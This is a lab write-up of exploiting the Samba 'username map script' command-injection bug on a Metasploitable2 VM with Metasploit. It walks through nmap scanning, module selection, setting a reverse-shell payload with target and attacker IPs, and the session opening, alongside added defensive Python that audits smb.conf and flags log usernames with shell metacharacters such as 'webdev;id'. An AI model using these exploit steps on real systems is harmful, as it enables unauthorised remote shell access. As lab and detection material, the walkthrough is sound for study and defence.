Samba passes unfiltered user input supplied through MS-RPC calls to /bin/sh when it invokes the external script defined in smb.conf, which allows remote command execution.
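The external script in question is the one named by the `username map script` option. As an added example (not code from the original post or from the Samba project), here is a small audit that parses an smb.conf, flags that directive wherever it appears, and shows the same server configuration with the directive replaced by a static `username map` file, which together with running a patched Samba release is the fix for this bug. Both configurations and the script path are constructed samples.

```python
import re

# Constructed sample: [global] enables the external mapping script, the
# non-default setting that usermap_script relies on.
VULNERABLE_CONF = """
[global]
   workgroup = WORKGROUP
   ; the external script receives the client-supplied username
   username map script = /etc/samba/scripts/mapusers.sh

[tmp]
   path = /tmp
   writable = yes
"""

# Constructed sample: same server with the directive removed; a static map
# file does not shell out, so client input never reaches /bin/sh.
HARDENED_CONF = """
[global]
   workgroup = WORKGROUP
   username map = /etc/samba/smbusers
"""


def parse_smb_conf(text):
    """Parse smb.conf into {section: {key: value}}. Keys are lower-cased with
    whitespace collapsed, matching how Samba treats option names."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # smb.conf comments start the line
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections


def audit_username_map_script(text):
    """Return one finding per section that sets 'username map script';
    an empty list means the risky directive is absent."""
    findings = []
    for section, opts in parse_smb_conf(text).items():
        script = opts.get("username map script")
        if script:
            findings.append(f"[{section}] username map script = {script}: "
                            "client-supplied usernames reach /bin/sh")
    return findings
```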
The target machine used here is Metasploitable2.
Linux attacker: 192.168.43.113; Linux target: 192.168.43.23. First scan the target to collect information about the services it exposes, using nmap to list the open ports and the applications behind them:
```
msf5 > nmap -sV 192.168.43.23
[*] exec: nmap -sV 192.168.43.23

Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-02 22:22 CST
Nmap scan report for 192.168.43.23
Host is up (0.0012s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.70%I=7%D=9/2%Time=5F4FAAAA%P=x86_64-pc-linux-gnu%r(NULL
SF:,2B,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(kali\)\
SF:n");
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.39 seconds
```

The target is running a Samba 3.x service. Use `search samba 3.x` to find a matching exploit module:
```
msf5 > search samba 3.x

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   1   auxiliary/admin/http/intersil_pass_reset              2007-09-10       normal     Yes    Intersil (Boa) HTTPd Basic Authentication Password Reset
   2   auxiliary/admin/smb/samba_symlink_traversal                            normal     No     Samba Symlink Directory Traversal
   3   auxiliary/dos/samba/lsa_addprivs_heap                                  normal     No     Samba lsa_io_privilege_set Heap Overflow
   4   auxiliary/dos/samba/lsa_transnames_heap                                normal     No     Samba lsa_io_trans_names Heap Overflow
   5   auxiliary/dos/samba/read_nttrans_ea_list                               normal     No     Samba read_nttrans_ea_list Integer Overflow
   6   auxiliary/scanner/rsync/modules_list                                   normal     Yes    List Rsync Modules
   7   auxiliary/scanner/smb/smb_uninit_cred                                  normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   8   auxiliary/scanner/ssh/eaton_xpert_backdoor            2018-07-18       normal     Yes    Eaton Xpert Meter SSH Private Key Exposure Scanner
   9   exploit/freebsd/samba/trans2open                      2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   10  exploit/linux/http/efw_chpasswd_exec                  2015-06-28       excellent  No     Endian Firewall Proxy Password Change Command Injection
   11  exploit/linux/http/imperva_securesphere_exec          2018-10-08       excellent  Yes    Imperva SecureSphere PWS Command Injection
   12  exploit/linux/http/zenoss_showdaemonxmlconfig_exec    2012-07-30       good       Yes    Zenoss 3 showDaemonXMLConfig Command Execution
   13  exploit/linux/samba/chain_reply                       2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   14  exploit/linux/samba/is_known_pipename                 2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   15  exploit/linux/samba/lsa_transnames_heap               2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   16  exploit/linux/samba/setinfopolicy_heap                2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   17  exploit/linux/samba/trans2open                        2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   18  exploit/multi/http/joomla_http_header_rce             2015-12-14       excellent  Yes    Joomla HTTP Header Unauthenticated Remote Code Execution
   19  exploit/multi/http/plone_popen2                       2011-10-04       excellent  Yes    Plone and Zope XMLTools Remote Command Execution
   20  exploit/multi/http/rails_xml_yaml_code_exec           2013-01-07       excellent  No     Ruby on Rails XML Processor YAML Deserialization Code Execution
   21  exploit/multi/http/struts2_code_exec_showcase         2017-07-07       excellent  Yes    Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
   22  exploit/multi/http/struts_code_exec_classloader       2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   23  exploit/multi/http/struts_default_action_mapper       2013-07-02       excellent  Yes    Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
   24  exploit/multi/samba/nttrans                           2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   25  exploit/multi/samba/usermap_script                    2007-05-14       excellent  No     Samba "username map script" Command Execution
   26  exploit/osx/samba/lsa_transnames_heap                 2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   27  exploit/osx/samba/trans2open                          2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   28  exploit/solaris/samba/lsa_transnames_heap             2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   29  exploit/solaris/samba/trans2open                      2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   30  exploit/unix/http/quest_kace_systems_management_rce   2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   31  exploit/unix/misc/distcc_exec                         2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   32  exploit/unix/webapp/citrix_access_gateway_exec        2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   33  exploit/unix/webapp/joomla_akeeba_unserialize         2014-09-29       excellent  Yes    Joomla Akeeba Kickstart Unserialize Remote Code Execution
   34  exploit/unix/webapp/joomla_contenthistory_sqli_rce    2015-10-23       excellent  Yes    Joomla Content History SQLi Remote Code Execution
   35  exploit/unix/webapp/joomla_media_upload_exec          2013-08-01       excellent  Yes    Joomla Media Manager File Upload Vulnerability
   36  exploit/unix/webapp/phpmyadmin_config                 2009-03-24       excellent  No     PhpMyAdmin Config File Code Injection
   37  exploit/windows/browser/awingsoft_web3d_bof           2009-07-10       average    No     AwingSoft Winds3D Player SceneURL Buffer Overflow
   38  exploit/windows/fileformat/ms14_060_sandworm          2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   39  exploit/windows/http/apache_modjk_overflow            2007-03-02       great      Yes    Apache mod_jk 1.2.20 Buffer Overflow
   40  exploit/windows/http/ia_webmail                       2003-11-03       average    No     IA WebMail 3.x Buffer Overflow
   41  exploit/windows/http/sambar6_search_results           2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   42  exploit/windows/license/calicclnt_getconfig           2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   43  exploit/windows/smb/group_policy_startup              2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   44  post/linux/gather/enum_configs                                         normal     No     Linux Gather Configurations
```

Select the `exploit/multi/samba/usermap_script` module (entry 25), then list the payload modules that are compatible with it:
```
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show payloads

Compatible Payloads
===================

   #   Name                                   Disclosure Date  Rank    Check  Description
   -   ----                                   ---------------  ----    -----  -----------
   1   cmd/unix/bind_awk                                       normal  No     Unix Command Shell, Bind TCP (via AWK)
   2   cmd/unix/bind_busybox_telnetd                           normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   3   cmd/unix/bind_inetd                                     normal  No     Unix Command Shell, Bind TCP (inetd)
   4   cmd/unix/bind_lua                                       normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   cmd/unix/bind_netcat                                    normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   cmd/unix/bind_netcat_gaping                             normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   cmd/unix/bind_netcat_gaping_ipv6                        normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   cmd/unix/bind_perl                                      normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   cmd/unix/bind_perl_ipv6                                 normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  cmd/unix/bind_r                                         normal  No     Unix Command Shell, Bind TCP (via R)
   11  cmd/unix/bind_ruby                                      normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  cmd/unix/bind_ruby_ipv6                                 normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  cmd/unix/bind_socat_udp                                 normal  No     Unix Command Shell, Bind UDP (via socat)
   14  cmd/unix/bind_zsh                                       normal  No     Unix Command Shell, Bind TCP (via Zsh)
   15  cmd/unix/generic                                        normal  No     Unix Command, Generic Command Execution
   16  cmd/unix/reverse                                        normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   17  cmd/unix/reverse_awk                                    normal  No     Unix Command Shell, Reverse TCP (via AWK)
   18  cmd/unix/reverse_bash_telnet_ssl                        normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   19  cmd/unix/reverse_ksh                                    normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   20  cmd/unix/reverse_lua                                    normal  No     Unix Command Shell, Reverse TCP (via Lua)
   21  cmd/unix/reverse_ncat_ssl                               normal  No     Unix Command Shell, Reverse TCP (via ncat)
   22  cmd/unix/reverse_netcat                                 normal  No     Unix Command Shell, Reverse TCP (via netcat)
   23  cmd/unix/reverse_netcat_gaping                          normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   24  cmd/unix/reverse_openssl                                normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   25  cmd/unix/reverse_perl                                   normal  No     Unix Command Shell, Reverse TCP (via Perl)
   26  cmd/unix/reverse_perl_ssl                               normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   27  cmd/unix/reverse_php_ssl                                normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   28  cmd/unix/reverse_python                                 normal  No     Unix Command Shell, Reverse TCP (via Python)
   29  cmd/unix/reverse_python_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   30  cmd/unix/reverse_r                                      normal  No     Unix Command Shell, Reverse TCP (via R)
   31  cmd/unix/reverse_ruby                                   normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   32  cmd/unix/reverse_ruby_ssl                               normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   33  cmd/unix/reverse_socat_udp                              normal  No     Unix Command Shell, Reverse UDP (via socat)
   34  cmd/unix/reverse_ssl_double_telnet                      normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   35  cmd/unix/reverse_zsh                                    normal  No     Unix Command Shell, Reverse TCP (via Zsh)
```

Set the `cmd/unix/reverse` reverse-connection payload, the target IP address (RHOSTS), the port being exploited (RPORT), and the attacking host's IP address (LHOST):
```
msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.43.23
RHOSTS => 192.168.43.23
msf5 exploit(multi/samba/usermap_script) > set RPORT 445
RPORT => 445
msf5 exploit(multi/samba/usermap_script) > set LHOST 192.168.43.113
LHOST => 192.168.43.113
msf5 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.43.23    yes       The target address range or CIDR identifier
   RPORT   445              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.43.113   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
```

With everything set, launch the module with `exploit` or `run`:
```
msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 192.168.43.113:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oQwX81x659bJ0os8;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "oQwX81x659bJ0os8\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (192.168.43.113:4444 -> 192.168.43.23:49794) at 2020-09-02 23:02:57 +0800
```

Once the attack succeeds, msf has a shell on the target host. To confirm that the shell really belongs to the target, query its hostname, user name and IP address:
```
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:fa:dd:2a
          inet addr:192.168.43.23  Bcast:192.168.43.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fefa:dd2a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2410 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1961 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:190106 (185.6 KB)  TX bytes:138231 (134.9 KB)
          Interrupt:17 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:278 errors:0 dropped:0 overruns:0 frame:0
          TX packets:278 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:110249 (107.6 KB)  TX bytes:110249 (107.6 KB)
```

The output shows the target's address (192.168.43.23), so the command ran on the target host.
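From the defender's side, the session above leaves a trace that is easy to spot: the module delivers its command inside the SMB username, so a username containing shell metacharacters shows up in smbd's authentication log. The following detection check is an added example, not part of the original post or of Samba; it assumes smbd is logging at log level 2 or higher so that `check_ntlm_password` messages are written, and the three log lines it scans are constructed to mimic that format.

```python
import re

# Constructed smbd log lines in the shape of Samba 3.x level-2 auth messages.
# Only the second entry carries shell metacharacters in the username.
SAMPLE_LOG = """\
[2020/09/02 23:01:12,  2] auth/auth.c:check_ntlm_password(319)
  check_ntlm_password:  Authentication for user [msfadmin] -> [msfadmin] succeeded
[2020/09/02 23:02:55,  2] auth/auth.c:check_ntlm_password(319)
  check_ntlm_password:  Authentication for user [webdev;id] -> [webdev;id] FAILED with error NT_STATUS_NO_SUCH_USER
[2020/09/02 23:03:40,  2] auth/auth.c:check_ntlm_password(319)
  check_ntlm_password:  Authentication for user [alice] -> [alice] FAILED with error NT_STATUS_WRONG_PASSWORD
"""

# Username as smbd received it from the client, before any mapping.
USER_RE = re.compile(r"Authentication for user \[([^\]]*)\]")

# Characters /bin/sh interprets; none of them belongs in a real account name,
# so their presence is a strong signal regardless of the auth result.
SHELL_META = frozenset("`$;|&<>()\\\n")


def suspicious_usernames(log_text):
    """Return (line_number, username) for every auth attempt whose
    client-supplied username contains shell metacharacters."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = USER_RE.search(line)
        if m and SHELL_META.intersection(m.group(1)):
            hits.append((lineno, m.group(1)))
    return hits


if __name__ == "__main__":
    for lineno, user in suspicious_usernames(SAMPLE_LOG):
        print(f"line {lineno}: suspicious username {user!r}")
```

Because `username map script` runs before authentication, the attempt is logged as a failure (or not as a login at all on lower log levels), which is why the check keys on the username rather than on the outcome.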
Summary: five minutes of attacking, two hours of setup. Another plain but fulfilling day!